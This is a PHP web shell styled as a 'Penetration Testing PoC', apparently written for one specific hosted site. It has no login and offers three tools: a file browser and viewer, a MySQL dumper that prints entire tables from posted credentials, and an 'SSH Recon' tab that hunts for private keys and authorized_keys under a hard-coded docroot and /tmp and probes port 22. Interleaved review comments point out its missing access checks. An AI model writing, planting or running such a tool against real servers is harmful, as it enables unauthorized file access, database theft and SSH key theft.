File Reader
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>PHP Explorer · Modern UI</title>
<!-- Tailwind CSS + Font Awesome -->
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
/* Smooth fade-in animation */
.fade-in { animation: fadeIn 0.3s ease-in; }
@keyframes fadeIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
/* Hover scale for cards */
.hover-scale:hover { transform: scale(1.02); transition: transform 0.2s; }
</style>
</head>
<body class="bg-gradient-to-br from-gray-900 to-gray-800 min-h-screen text-gray-200 p-6 font-sans">
<?php
// ==================== CONFIG ====================
// NOTE(review): no authentication or access check is visible anywhere in this file;
// every action below runs for whoever can request the page.
// Read the interpreter's open_basedir setting. The raw string is also printed in
// the File Browser header further down.
$openBasedir = ini_get('open_basedir');
// Split the setting into base directories on PATH_SEPARATOR. When the setting is
// empty the list becomes ['/'], and isPathAllowed() then accepts any path that resolves.
$allowedPaths = explode(PATH_SEPARATOR, $openBasedir ?: '/'); // fallback to root if not set (but it is set)
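/**
 * Report whether $path resolves to a location inside one of the base
 * directories held in the global $allowedPaths list.
 *
 * Both sides are canonicalised with realpath(), so symlinks and ".." segments
 * are resolved before comparing and a path that does not exist is rejected.
 * A match requires the resolved path to equal a base directory or to continue
 * with a directory separator right after it. A bare string-prefix test would
 * also accept a sibling such as "/srv/app-old" for the base "/srv/app"
 * (constructed example).
 *
 * This is a containment test only. It is not an authentication or
 * authorisation check, and its answer can go stale if the filesystem changes
 * between this call and the later read.
 *
 * @param mixed $path Candidate path, normally taken from the request.
 * @return bool True when the resolved path lies inside an allowed base.
 */
function isPathAllowed($path) {
    global $allowedPaths;
    // Query-string values can arrive as arrays; reject anything that is not a
    // string instead of handing it to realpath().
    if (!is_string($path)) return false;
    $real = realpath($path);
    if ($real === false) return false;
    foreach ($allowedPaths as $base) {
        $baseReal = realpath($base);
        if ($baseReal === false) continue;
        if ($real === $baseReal) return true;
        // Compare against "<base><separator>" so only true descendants match.
        $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $prefix, strlen($prefix)) === 0) return true;
    }
    return false;
}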
// Choose the directory to list: the "dir" query parameter when present,
// otherwise the process working directory.
// NOTE(review): the value is request-controlled and this block does not confirm
// it is a string before using it.
$currentDir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
if (!$currentDir || !isPathAllowed($currentDir)) {
$currentDir = getcwd(); // fallback to script's directory (which is allowed)
}
// NOTE(review): after the check $currentDir still holds the string as supplied,
// not a realpath()-resolved form, and that raw string is what gets listed and linked.
// ==================== ACTIONS ====================
// Tab selector; the templates below compare it with 'filemanager', 'database' and 'ssh'.
$action = $_GET['action'] ?? 'filemanager';
?>
<!-- Header with tabs -->
<div class="max-w-6xl mx-auto">
<div class="flex justify-center space-x-4 mb-8">
<a href="?action=filemanager&dir=<?= urlencode($currentDir) ?>"
class="px-6 py-3 rounded-full font-semibold transition-all duration-300 <?= $action == 'filemanager' ? 'bg-blue-600 text-white shadow-lg' : 'bg-gray-700 text-gray-300 hover:bg-gray-600' ?>">
<i class="fas fa-folder-open mr-2"></i>File Manager
</a>
<a href="?action=database"
class="px-6 py-3 rounded-full font-semibold transition-all duration-300 <?= $action == 'database' ? 'bg-blue-600 text-white shadow-lg' : 'bg-gray-700 text-gray-300 hover:bg-gray-600' ?>">
<i class="fas fa-database mr-2"></i>Database Dump
</a>
<a href="?action=ssh"
class="px-6 py-3 rounded-full font-semibold transition-all duration-300 <?= $action == 'ssh' ? 'bg-blue-600 text-white shadow-lg' : 'bg-gray-700 text-gray-300 hover:bg-gray-600' ?>">
<i class="fas fa-terminal mr-2"></i>SSH Info
</a>
</div>
<!-- Content area -->
<div class="bg-gray-800 rounded-2xl shadow-2xl p-6 fade-in">
<?php if ($action == 'filemanager'): ?>
<!-- ========== FILE MANAGER ========== -->
<div class="flex items-center justify-between mb-4">
<h2 class="text-2xl font-bold"><i class="fas fa-folder-open text-blue-400 mr-2"></i>File Browser</h2>
<span class="text-sm bg-gray-700 px-3 py-1 rounded-full">open_basedir: <?= htmlspecialchars($openBasedir ?: 'none') ?></span>
</div>
<div class="mb-4 flex items-center bg-gray-700 rounded-lg p-2">
<i class="fas fa-location-dot text-gray-400 mr-2"></i>
<span class="font-mono text-sm break-all"><?= htmlspecialchars($currentDir) ?></span>
</div>
<?php
// Two modes: ?view=<path> prints one file's contents; otherwise the entries of
// $currentDir are rendered as clickable cards.
// NOTE(review): the only gate on either mode is isPathAllowed(); no login or
// per-user check is visible in this file, so anything the PHP process can read
// inside the allowed paths is exposed to the requester.
if (isset($_GET['view'])) {
// Show file content
// NOTE(review): 'view' is request-controlled and is not confirmed to be a string here.
$file = $_GET['view'];
if (isPathAllowed($file) && is_file($file)) {
// The whole file is read into memory; no size limit is applied in this block.
$content = file_get_contents($file);
echo "<div class='mb-4'><a href='?action=filemanager&dir=" . urlencode(dirname($file)) . "' class='text-blue-400 hover:underline'><i class='fas fa-arrow-left mr-1'></i>Back</a></div>";
// Contents are HTML-escaped before being placed in the <pre> block.
echo "<pre class='bg-gray-900 p-4 rounded-lg overflow-x-auto text-sm'><code>" . htmlspecialchars($content) . "</code></pre>";
} else {
echo "<p class='text-red-400'>File not allowed or not found.</p>";
}
} else {
// List directory contents
$files = scandir($currentDir);
if ($files === false) {
echo "<p class='text-red-400'>Cannot read directory.</p>";
} else {
// Parent directory link, shown only when the parent differs from the current
// directory and itself passes isPathAllowed().
$parent = dirname($currentDir);
if ($parent != $currentDir && isPathAllowed($parent)) {
echo "<a href='?action=filemanager&dir=" . urlencode($parent) . "' class='inline-block mb-4 bg-gray-700 hover:bg-gray-600 px-4 py-2 rounded-lg transition'><i class='fas fa-level-up-alt mr-2'></i>Go up</a>";
}
echo "<div class='grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-3'>";
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$fullPath = $currentDir . DIRECTORY_SEPARATOR . $file;
// Each entry is re-checked because its resolved target can differ from the
// directory it is listed in.
if (!isPathAllowed($fullPath)) continue; // safety
$isDir = is_dir($fullPath);
// Last four octal digits of the mode returned by fileperms().
$perms = substr(sprintf('%o', fileperms($fullPath)), -4);
// '-' for directories; bytes below 1024, otherwise KB rounded to two decimals.
$size = $isDir ? '-' : (filesize($fullPath) < 1024 ? filesize($fullPath).' B' : round(filesize($fullPath)/1024,2).' KB');
// The only dynamic part of the onclick attribute is urlencode() output.
echo "<div class='bg-gray-700 rounded-xl p-3 hover-scale transition cursor-pointer' onclick=\"window.location='?action=filemanager&" . ($isDir ? "dir=" : "view=") . urlencode($fullPath) . "'\">";
echo "<div class='flex items-center'>";
echo "<i class='fas " . ($isDir ? 'fa-folder text-yellow-400' : 'fa-file text-blue-300') . " mr-3 text-xl'></i>";
echo "<div class='flex-1 truncate'>";
// The file name is HTML-escaped for display.
echo "<div class='font-medium truncate'>" . htmlspecialchars($file) . "</div>";
echo "<div class='text-xs text-gray-400'>" . $perms . " | " . $size . "</div>";
echo "</div>";
echo "</div></div>";
}
echo "</div>";
}
}
?>
<?php elseif ($action == 'database'): ?>
<!-- ========== DATABASE DUMP ========== -->
<h2 class="text-2xl font-bold mb-4"><i class="fas fa-database text-green-400 mr-2"></i>MySQL Dumper</h2>
<?php
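// Step selector for the dumper, taken from the POST body: 'connect' (default) or 'dump'.
$step = $_POST['step'] ?? 'connect';
if ($step == 'connect' && isset($_POST['host'], $_POST['user'], $_POST['pass'], $_POST['db'])) {
    // Open a MySQL connection. Host, user, password and database all come
    // straight from the request; nothing here restricts which server is contacted.
    $host = $_POST['host'];
    $user = $_POST['user'];
    $pass = $_POST['pass'];
    $db = $_POST['db'];
    $mysqli = @new mysqli($host, $user, $pass, $db);
    if ($mysqli->connect_error) {
        // The driver message may repeat request-supplied values, so it is
        // HTML-escaped before being written into the page.
        echo "<div class='bg-red-600/20 border border-red-600 text-red-300 p-4 rounded-lg mb-4'>Connection failed: " . htmlspecialchars($mysqli->connect_error, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</div>";
        $step = 'connect';
    } else {
        // List the tables of the selected database and offer them as checkboxes.
        $tables = $mysqli->query("SHOW TABLES");
        if ($tables) {
            echo "<form method='post' class='space-y-4'>";
            echo "<input type='hidden' name='step' value='dump'>";
            // NOTE(review): the submitted credentials, password included, are written
            // back into the page as hidden fields so the next step can reconnect.
            foreach (['host','user','pass','db'] as $f) {
                // ENT_QUOTES is explicit because the value sits in a single-quoted
                // attribute and older PHP defaults leave single quotes unescaped.
                echo "<input type='hidden' name='$f' value='" . htmlspecialchars($_POST[$f], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "'>";
            }
            echo "<label class='block text-sm font-medium mb-2'>Select tables to dump:</label>";
            echo "<div class='grid grid-cols-2 md:grid-cols-3 gap-2 max-h-60 overflow-y-auto p-2 bg-gray-700 rounded-lg'>";
            while ($row = $tables->fetch_array()) {
                $table = $row[0];
                $tableHtml = htmlspecialchars($table, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
                echo "<label class='flex items-center space-x-2'><input type='checkbox' name='tables[]' value='" . $tableHtml . "' class='form-checkbox h-4 w-4 text-blue-600'><span>" . $tableHtml . "</span></label>";
            }
            echo "</div>";
            echo "<button type='submit' class='bg-blue-600 hover:bg-blue-700 px-6 py-2 rounded-lg font-semibold transition'><i class='fas fa-download mr-2'></i>Dump Selected</button>";
            echo "</form>";
        }
        $mysqli->close();
    }
}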
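// Dump step: reconnect with the posted credentials and print each selected
// table as one INSERT statement inside a <pre> block.
if ($step == 'dump' && isset($_POST['tables'])) {
    $mysqli = @new mysqli($_POST['host'], $_POST['user'], $_POST['pass'], $_POST['db']);
    if (!$mysqli->connect_error) {
        echo "<div class='mb-4'><a href='?action=database' class='text-blue-400 hover:underline'><i class='fas fa-arrow-left mr-1'></i>New connection</a></div>";
        echo "<pre class='bg-gray-900 p-4 rounded-lg overflow-x-auto text-sm'>";
        // tables[] is request data, not the list shown earlier: accept only
        // string entries and ignore anything else.
        $requested = is_array($_POST['tables']) ? array_filter($_POST['tables'], 'is_string') : [];
        // Everything written into the <pre> is HTML-escaped, because table names
        // and row values are untrusted text as far as the page is concerned.
        $toHtml = function($text) {
            return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        };
        foreach ($requested as $table) {
            // Quote the identifier by doubling embedded backticks so the name
            // cannot terminate the quoted identifier inside the statement.
            $quoted = '`' . str_replace('`', '``', $table) . '`';
            echo $toHtml("-- Dumping table: $table\n");
            $result = $mysqli->query("SELECT * FROM $quoted");
            if ($result) {
                $fields = $result->fetch_fields();
                $colNames = array_map(function($f) { return "`".$f->name."`"; }, $fields);
                echo $toHtml("INSERT INTO $quoted (" . implode(', ', $colNames) . ") VALUES\n");
                $rows = [];
                while ($row = $result->fetch_row()) {
                    // NULL stays a bare keyword; every other value is SQL-escaped and quoted.
                    $values = array_map(function($v) use ($mysqli) {
                        return $v === null ? 'NULL' : "'" . $mysqli->real_escape_string($v) . "'";
                    }, $row);
                    $rows[] = "(" . implode(', ', $values) . ")";
                }
                echo $toHtml(implode(",\n", $rows) . ";\n\n");
            }
        }
        echo "</pre>";
        $mysqli->close();
    }
}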
if ($step == 'connect' && !isset($_POST['host'])) {
// First visit to the tab (no host posted yet): render the connection form.
// The four fields are posted back to this same page with step=connect.
// NOTE(review): the form carries no anti-CSRF token and the page shows no login gate.
?>
<form method="post" class="space-y-4 max-w-md">
<input type="hidden" name="step" value="connect">
<div>
<label class="block text-sm font-medium mb-1">Host</label>
<input type="text" name="host" value="localhost" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2 focus:ring-2 focus:ring-blue-500">
</div>
<div>
<label class="block text-sm font-medium mb-1">Username</label>
<input type="text" name="user" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2">
</div>
<div>
<label class="block text-sm font-medium mb-1">Password</label>
<input type="password" name="pass" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2">
</div>
<div>
<label class="block text-sm font-medium mb-1">Database</label>
<input type="text" name="db" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2">
</div>
<button type="submit" class="bg-blue-600 hover:bg-blue-700 px-6 py-2 rounded-lg font-semibold transition"><i class="fas fa-plug mr-2"></i>Connect</button>
</form>
<?php
}
?>
<?php elseif ($action == 'ssh'): ?>
<!-- ========== SSH INFO ========== -->
<h2 class="text-2xl font-bold mb-4"><i class="fas fa-terminal text-purple-400 mr-2"></i>SSH Recon</h2>
<div class="space-y-4">
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-key mr-2"></i>Attempt to read SSH keys (within open_basedir)</h3>
<?php
// Probe a fixed list of key-file locations and, for each one that exists and
// passes isPathAllowed(), print a link into the file viewer (?view=...).
// NOTE(review): the list is hard-coded for one docroot (/www/wwwroot/hljrlsj.com)
// plus /tmp, so the file was written for a specific host. These literal paths are
// stable strings to search for when sweeping a web root for copies of this page.
$sshCandidates = [
'/tmp/authorized_keys',
'/www/wwwroot/hljrlsj.com/.ssh/authorized_keys',
'/www/wwwroot/hljrlsj.com/id_rsa',
'/tmp/id_rsa',
'/tmp/id_rsa.pub',
];
$found = false;
foreach ($sshCandidates as $path) {
if (file_exists($path) && isPathAllowed($path)) {
// The path is URL-encoded in the link and HTML-escaped in the label.
echo "<div class='mb-2'><a href='?action=filemanager&view=" . urlencode($path) . "' class='text-green-400 hover:underline'>" . htmlspecialchars($path) . " (click to view)</a></div>";
$found = true;
}
}
if (!$found) echo "<p class='text-gray-400'>No SSH key files found in allowed paths.</p>";
?>
</div>
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-users mr-2"></i>System users (from /etc/passwd?)</h3>
<p class="text-gray-400">/etc/passwd is outside open_basedir, cannot read directly. But we can check for home directories inside allowed paths (unlikely).</p>
</div>
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-network-wired mr-2"></i>SSH service status</h3>
<?php
// Open a TCP connection to 127.0.0.1:22 with a 2-second timeout. Warnings are
// suppressed with @, and $errno/$errstr are filled in but never read.
// The check only shows that something accepts connections on the port; no banner
// is read, so "SSH running" in the message below is an inference.
// NOTE(review): an outbound socket opened from a page template on every view of
// this tab is unusual for ordinary site code.
$ssh = @fsockopen('127.0.0.1', 22, $errno, $errstr, 2);
if ($ssh) {
echo "<p class='text-green-400'><i class='fas fa-check-circle mr-1'></i>Port 22 is open (SSH running).</p>";
fclose($ssh);
} else {
echo "<p class='text-yellow-400'><i class='fas fa-exclamation-triangle mr-1'></i>Port 22 seems closed or filtered.</p>";
}
?>
</div>
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-search mr-2"></i>Search for SSH config files</h3>
<?php
// List entries directly under the hard-coded docroot whose names end in ssh,
// SSH, config or Config (GLOB_BRACE expands the alternatives). Matches are
// printed HTML-escaped; they are not passed through isPathAllowed() here.
$configs = glob('/www/wwwroot/hljrlsj.com/*{ssh,SSH,config,Config}', GLOB_BRACE);
// glob() yields false or an empty array when nothing matches; both take the else branch.
if ($configs) {
foreach ($configs as $c) echo "<div>" . htmlspecialchars($c) . "</div>";
} else {
echo "<p class='text-gray-400'>None found.</p>";
}
?>
</div>
</div>
<?php endif; ?>
</div>
</div>
<!-- Footer -->
<div class="text-center text-gray-500 text-sm mt-6">
<i class="fas fa-shield-halved mr-1"></i> Penetration Testing PoC · Use responsibly
</div>
</body>
</html>